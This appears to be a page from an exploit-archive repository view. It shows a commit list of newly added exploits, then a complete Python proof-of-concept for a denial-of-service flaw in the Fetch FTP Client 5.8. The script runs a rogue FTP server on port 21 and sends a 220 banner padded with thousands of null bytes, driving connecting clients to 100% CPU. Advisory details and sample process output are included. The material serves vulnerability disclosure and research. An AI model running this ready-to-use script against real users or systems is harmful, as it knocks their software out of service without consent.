ad453a2c73
17 changes to exploits/shellcodes CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path Mozilla Firefox 67 - Array.pop JIT Type Confusion Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service) Ametys CMS v4.4.1 - Cross Site Scripting (XSS) uBidAuction v2.0.1 - 'Multiple' Cross Site Scripting (XSS) Chamilo LMS 1.11.14 - Account Takeover Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated) WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated) Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated) PHP Restaurants 1.0 - SQLi (Unauthenticated) Moodle 3.11.4 - SQL Injection Huawei DG8045 Router 1.0 - Credential Disclosure PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS) WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS) WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming
70 lines
No EOL
2 KiB
Python
Executable file
70 lines
No EOL
2 KiB
Python
Executable file
# Exploit Title: Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)
|
|
# Exploit Author: liquidworm
|
|
|
|
#!/usr/bin/env python
|
|
#
|
|
#
|
|
# Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service)
|
|
#
|
|
#
|
|
# Vendor: Fetch Softworks
|
|
# Product web page: https://www.fetchsoftworks.com
|
|
# Affected version: 5.8.2 (5K1354)
|
|
#
|
|
# Summary: Fetch is a reliable, full-featured file transfer client for the
|
|
# Apple Macintosh whose user interface emphasizes simplicity and ease of use.
|
|
# Fetch supports FTP and SFTP, the most popular file transfer protocols on
|
|
# the Internet for compatibility with thousands of Internet service providers,
|
|
# web hosting companies, publishers, pre-press companies, and more.
|
|
#
|
|
# Desc: The application is prone to a DoS after receiving a long server response
|
|
# (more than 2K bytes) leading to 100% CPU consumption.
|
|
#
|
|
# --------------------------------------------------------------------------------
|
|
# ~/Desktop> ps ucp 3498
|
|
# USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
|
|
# lqwrm 3498 100.0 0.5 60081236 54488 ?? R 5:44PM 4:28.97 Fetch-5K1354-266470421
|
|
# ~/Desktop>
|
|
# --------------------------------------------------------------------------------
|
|
#
|
|
# Tested on: macOS Monterey 12.2
|
|
# macOS Big Sur 11.6.2
|
|
#
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
# @zeroscience
|
|
#
|
|
#
|
|
# Advisory ID: ZSL-2022-5696
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php
|
|
#
|
|
#
|
|
# 27.01.2022
|
|
#
|
|
|
|
import socket
|
|
|
|
host = '0.0.0.0'
|
|
port = 21
|
|
|
|
s = socket.socket()
|
|
s.bind((host, port))
|
|
s.listen(2)
|
|
|
|
print('Ascolto su', host, 'porta', port, '...')
|
|
|
|
consumptor = '220\x20'
|
|
consumptor += 'ftp.zeroscience.mk'
|
|
consumptor += '\x00' * 0x101E
|
|
consumptor += '\x0D\x0A'
|
|
|
|
while True:
|
|
try:
|
|
c, a = s.accept()
|
|
print('Connessione da', a)
|
|
print('CPU 100%, Memory++')
|
|
c.send(bytes(consumptor, 'UTF-8'))
|
|
c.send(b'Thricer OK, p\'taah\x0A\x0D')
|
|
print(c.recv(17))
|
|
except:
|
|
break |